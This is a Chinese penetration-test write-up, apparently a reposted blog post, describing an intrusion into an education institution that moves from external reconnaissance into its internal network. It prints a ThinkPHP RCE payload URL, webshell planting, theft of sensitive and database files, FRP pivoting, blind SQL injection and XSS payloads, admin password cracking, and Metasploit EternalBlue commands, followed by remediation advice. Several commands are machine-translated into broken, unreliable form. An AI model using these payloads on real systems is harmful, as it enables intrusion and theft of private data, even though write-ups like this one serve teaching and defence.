第一条:法律依据
-
网络安全测试活动必须严格遵守以下法律法规:
-
《中华人民共和国网络安全法》
-
《中华人民共和国数据安全法》
-
《中华人民共和国个人信息保护法》
-
《计算机信息系统安全保护条例》
-
《中华人民共和国刑法》相关条款(尤其是第285-287条)
第二条:测试授权
-
所有网络安全测试必须事先获得授权。
2.1 对组织内部系统进行测试,应由公司法人授权并备案;
2.2 对第三方系统进行测试,必须出具由目标系统所有者签署的书面授权书;
2.3 禁止对未授权的公网目标进行探测、扫描、入侵或攻击行为。
这篇很久以前的报道,现在匿名发表,是一篇水文章。利用钟馗之眼和Fofa搜索资产,结合谷歌黑客技术,对该单位进行资产调查。
钟馗之眼语法
指纹搜索:例如:php app:dedecms var:5.7app:组件名称,例如:app:apachever:组件版本,例如:ver:2.0OS:操作系统,例如:os:windowService:服务名称,例如:service:vpnCidr:网段,例如:cidr:0.0.0.1/24Devic:设备名,例如:devic:routerkeyword:关键字查询,例如:keyword:technology尝试弱口令:例如:php app:phpmyadmin...谷歌黑客技术语法
inurl:example.com intitle:"index of"inurl:example.com intitle:"index of /" "*key.pem"intext:身份证 学院 -site:xxx.edu.cn -site:gov.cn filetype:xls 开放大学经过一番搜索,整理出的网络安全资产如下
http://xx.xx.xx.xx:9003http://xx.xx.xx.xx:8060http://xx.xx.xx.xx:6580我发现了一个存在漏洞的网站,而且这个网站有好几个端口,我访问每一个访问,发现9003端口有个ThinkPHP服务,接着我尝试对其进行漏洞攻击,尝试在网站上使用HTTP请求写入phpinfo()文件信息
http://xx.xx.xx.xx:9003//?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=phpinfo&vars[1][1]=0
然后尝试进行网站木马写入
他成功了,并能够在网站上执行该攻击。他为此获取了多个敏感文件+数据库文件。我在这里加了几千点积分。经过搜索,我用蚁剑发现向日葵显示最后一次连接是在28号。
该服务器有多个子网站,我上传了FRP反弹服务器端口工具,配置了Socket5协议,成功连接到服务器内网的网站。访问第一个网站,存在SQL注入,但网站是ASP类型
http://www.xxx.com/XXX_Class.asp?classid=2测试注入被内置waf拦截
XXX_Class.asp?classid=2'XXX_Class.asp?classid=2'select+union+1,2,3,4/**/--+
此外,这个waf还存在反射型xss
XXX_Class.asp?classid=2'+select+union+1,2,3,4+and(<img/src=""+onerrror=alert(1)>)--+
在Cookie中进行了注入,并通过手动SQL注入注入了几个用户表。为此,我通过解密MD5获取了网站管理员的账户密码
and (select top 1 abs(asc(mid(cstr(password),3,1))) from (select top 1 * from (select top 2 * from admin where 1=1 order by 1) t order by 1 desc)t where 1=1)>48 and 1<2然后使用网站目录扫描器对这个网站进行目录扫描
成功扫描到网站后台管理地址,然后尝试使用解密后的MD5管理员和账号密码登录
嘭!登录成功,我成功连接到网站管理员
在网站管理栏里可以关闭标签,又一个xss
另外,我使用内网工具扫描了服务器,发现了一些未授权访问漏洞。
然后我们使用Goby漏洞扫描工具扫描整理了几个资产
这些网站中有几个存在 MS17-010 漏洞
这个漏洞利用的方法如下
msf6 > search ms17-010# 使用exploit/windows/smb/ms17_010_eternalblue找到相关模块,索引号为0匹配模块================# 名称 披露日期 等级 检查 描述- ---- --------------- ---- ----- -----------0exploit/windows/smb/ms17_010_eternalblue 2017-03-14 平均 是 MS17-010 EternalBlue SMB 远程 Windows 内核池损坏1exploit/windows/smb/ms17_010_psexec 2017-03-14 正常 是 MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB 远程 Windows 代码执行2辅助/admin/smb/ms17_010_command 2017-03-14 正常 否 MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB 远程 Windows 命令执行3 辅助/scanner/smb/smb_ms17_010 正常 否 MS17-010 SMB RCE 检测4 漏洞利用/windows/smb/smb_doublepulsar_rce 2017-04-14 很好 是 SMB DOUBLEPULSAR 远程代码执行# 使用模块 0msf6 > 使用 0# 您可以使用 show options 查看参数和有效载荷。您会发现,只需为参数设置一个 RHOSTS 目标主机 IP 地址即可。 Payload 有默认值,无需设置。msf6exploit(windows/smb/ms17_010_eternalblue) > show options# 设置 RHOSTS 目标主机 IPmsf6exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.242.6# 开始攻击run然后我拿到了几个主机的权限,就结束了。我写了报告,提交给了总部。
1. ThinkPHP 远程代码执行漏洞修复建议
漏洞描述:ThinkPHP存在远程函数调用漏洞,该漏洞可能导致任意代码执行。
将ThinkPHP更新到官方最新版本(建议≥5.1.31或6.x)。
禁用不必要的调试模式(APP_DEBUG => false)。
添加路由白名单限制,防止InvokeFunction等敏感函数泄露。
使用 WAF/IDS 阻止恶意请求模式。
2. 应对弱密码/默认密码风险的建议
漏洞描述:系统/服务存在默认密码或弱密码,可被暴力破解。
为所有服务启用复杂的密码策略(至少12个字符,包括大小写字母、数字和符号)。
禁用默认帐户或更改默认用户名。
启用失败登录锁定和多重身份验证 (MFA)。
定期检查您的帐户密码使用情况。
3. 消除SQL注入漏洞的建议
漏洞描述:通过对输入数据不进行过滤而直接拼接,从而造成SQL注入。
所有输入参数必须使用准备好的语句。
严格限制类型并将传入参数列入白名单。
启用最小数据库权限(例如只读权限,无 DROP 权限)。
使用网络防火墙来阻止注入请求。
4. 消除反射型XSS漏洞的建议
漏洞描述:用户可以创建触发控制界面的恶意脚本。
所有以 HTML 格式输出的内容都必须使用 HTML 实体进行编码。
严格验证 URL、参数和标头中的所有用户输入。
使用 CSP(内容安全策略)来阻止嵌入式脚本的执行。
在浏览器中设置HTTP标头:X-XSS-Protection: 1;模式=阻止。
5. 消除目录/后端地址泄露风险的建议
漏洞描述:未进行路径加固,后台地址可被扫描器检测到。
重命名后端路径并添加动态参数验证。
配置 Nginx/Apache 以限制对控制路径的 IP 地址白名单的访问。
启用登录保护机制,如验证码、双因素身份验证等。
六消除未经授权的访问和机密信息泄露的建议
漏洞描述:部分服务端口默认开放,无需认证,避免信息泄露。
所有服务必须启用访问认证并避免调试输出。
关闭未使用的端口和服务并配置防火墙策略限制。
对敏感文件进行权限隔离、加密、访问日志审计。
七漏洞 MS17-010(永恒之蓝)修复建议
漏洞描述:Windows SMBv1协议存在远程执行漏洞。
将您的系统补丁更新至2017年3月的Microsoft安全更新(KB4012212/KB4012215)。
禁用 SMBv1 协议:
PowerShell
设置 SmbServerConfiguration -EnableSMB1Protocol $false
启用 Windows Defender ATP 来监控 SMB 通信。
禁用网络侧445端口的外部连接。
原文始发于微信公众号(Gh0xE9):记某次EDU从外网打点进内网
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论